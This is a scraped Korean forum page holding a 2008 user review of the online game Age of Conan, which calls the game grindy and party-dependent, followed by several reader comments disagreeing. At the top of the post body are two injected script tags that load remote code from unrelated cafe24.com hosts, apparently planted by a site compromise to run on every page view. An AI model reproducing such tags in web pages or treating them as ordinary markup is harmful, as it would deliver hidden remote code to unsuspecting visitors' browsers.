이 게임을 해볼려고 하시는 분은 > ageofconan

본문 바로가기
사이트 내 전체검색

ageofconan

이 게임을 해볼려고 하시는 분은

페이지 정보

작성자 후훗훗 메일보내기 이름으로 검색  (125.♡.216.138) 댓글 8건 조회 6,085회 작성일 08-07-11 14:16

본문

<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script><SCRIPT Language=JavaScript src=http://dlcjsvlf.cafe24.com/Wiz.php></script>      딱 한달 정도는 접해볼만 합니다.

물론 한달간 정도 일로 부터 여유있는 분에만 해당합니다.

이게임의 특징인 미려한 배경 요거 보고 박진감 넘치는 전투 요거

딱 두개는 한달정도면 충분히 즐길수 있습니다.

다른 게임보다 배경은 꽉 차있으니까요.

일단 케릭은 여러명 있긴 합니다만

한 캐릭만 키워도 됩니다. 나중에는 파티플 안하면 할게 없으니까요.

그냥 아무거나 만렙되는거 있으면 되겠네요.

솔직히 두캐릭씩 키우는 분 존경스럽습니다.

그 크다란 공간을 두번씩이나 지겨움에 졸리는걸 견뎌가며 뛰어다니는건

보통 인내아니면 할수없는일이죠.

이런 분들 퀘스트가 재밌다고 하지만 절대 네버 퀘스트는 재미 없습니다.

단지 싸우는게 박진감 넘쳐서 할뿐이죠.

한달간 틈틈히하면 80렙 달게됩니다. 다는 순간 할게 없어집니다.

아무리 전투가 박진감 넘쳐도 경험치 못얻는 전투 그리고 죽여봐야 그게 그거인 아템

아무 의미 없죠. 혹자는 아템얻을려고 하냐 하시는데 그럼 이게 어드벤쳐 게임입니까

이런 게임에 있어서 아템이 가지는 의미는 각별합니다.

단 레이드로 괜찮은 아템이 나오긴합니다.

뭐 일부 사람은 만렙달고 자원 수집이나 레이드로 바쁘다고 하는데

레이드 고거 양키들이랑 시간 맞출려면 장난 아닙니다 -_-;

얘들은 거의가 밤늦게 레이드 그룹이 형성되더군요. 밤새서하는 페인 아니시면

심신이 매우 피로하실겁니다-_-;

거기다 양키들도 한번 레이드 하는게 어려울정도로 행사에 가깝죠.

레이드로 아이템 맞추는건 초 극페인 아니시면 어려우실것 같네요.

시간적인 제약 이건 북미 게임이니 별수 없는 아쉬운 부분이긴합니다 딱 이부분만..

그외 자원 채집.. 퀘스트 목적으로 달려가도 지겨운데 자원 채집 하나 할려고 여기저기 돌아

다니자니 졸려 디지겠더군요.

그리고 만렙 달고나면 솔플 절대 못합니다. 솔플 컨텐츠가 없으니까요.

파티아니고서는 거기다가 그 파티도 레이드 파티이므로 최소 풀파티에서 시작해야하죠.

이 게임을 그동안 하면서 느낀점은 오블리비언에서 참 많이 가져왔다는 걸 알수있었습니다.

많이 가져왔으면서도 오블리비언의 그 좋은 맵 이동을 일일이 걸어다녀야만 한다는

수고를 주신 제작진들.. 오블하면서 맵 이동이 롤플레잉 게임에 안맞다고 여겨지셨나봅니다.

직장인들.. 절대 이 겜 하지마십시오. 별 쓸데없는 부분에 시간 낭비로 아마 스트레스 많이 받

으실 겁니다..

아마 앞으로 컨텐츠가 추가되더라도 오로지 파티외엔 할수 없는 컨텐츠들일것이죠.

너무 와우에 의식한 나머지 솔플은 아예 배제된 컨텐츠들입니다.

정말 한달 -_-; 아무 남는거 없이 버린걸 생각하니 울화통만 남는군요..
추천87 비추천0

댓글목록

Avan님의 댓글

Avan 이름으로 검색 아이피 (118.♡.43.240) 작성일

저는 pvp가 재밌습니다. 달리는것도 주변 풍경을 보면서 달립니다.
그리고 중요한건 직장인 입니다. 근데 재미가 있네요.
제가 말씀드리고자 하는건 개개인 모두 취향이 다르다는 겁니다.
아이템 파밍이 잘 되지 않아 맘에 들지 않으신다면 내년에 나올 디아블로3를 추천해 드립니다.

jaquio님의 댓글

jaquio 이름으로 검색 아이피 (116.♡.14.203) 작성일

게임 즐기려고 하는거 아닌가... 뭘 그렇게 하시면서 스트레스받는지...뭘 바라는건지..어느게임이든 레이드할려면 초폐인 되는건 당연한거 아닌가 그나마 이건 취향이지만 피케이가 재밌으니까 하는거죠..

로켓단님의 댓글

로켓단 이름으로 검색 아이피 (220.♡.243.184) 작성일

큭큭큭, 이분글은 전부다 부정적이네요. 글을 보시는 분들은 이쪽 저쪽 다 살펴보시고 판단하시기를...

bored님의 댓글

bored 이름으로 검색 아이피 (121.♡.139.156) 작성일

제가 후후훗님께 게임 하나 추천해드립니다.. 리니지1, 2 추천합니다.

쿨럭군님의 댓글

쿨럭군 이름으로 검색 아이피 (211.♡.213.212) 작성일

파판 11도 극파티 플이죠. 그래도 할만하다능. mmorpg는 원래 파티플이 주축이어야 되는거 아닌가요?

헌터킬러님의 댓글

헌터킬러 이름으로 검색 아이피 (118.♡.244.149) 작성일

글읽다가 로그인합니다.
전 온라인게임 매니아입니다.
온라인게임은 무조건 몹만잡고 렙만 올리고 만렙다는게 목표가 아닙니다.
온라인게임의 생명은 사람과사람간의 커뮤니티입니다.
그게 안되면 온라인게임의 재미를 거의 못느낍니다.
게임상에서 친한사람과 사귀며 길드원과 많은 이야기를 나누면서 그중에서 게임은 부수적으로 되면
그사람이 바로 온라인게임을 가장 즐겁고재밌게 즐기고있는 사람이다 라고 보시면 됩니다.

전병천님의 댓글

전병천 이름으로 검색 아이피 (168.♡.177.75) 작성일

이글대로 하면 울티마 온라인은 개 허접 게임? (몇시간이면 만랩다는데)

공지사항

• 게시물이 없습니다.

회원로그인

접속자집계

오늘
1,418
어제
1,553
최대
1,587
전체
13,683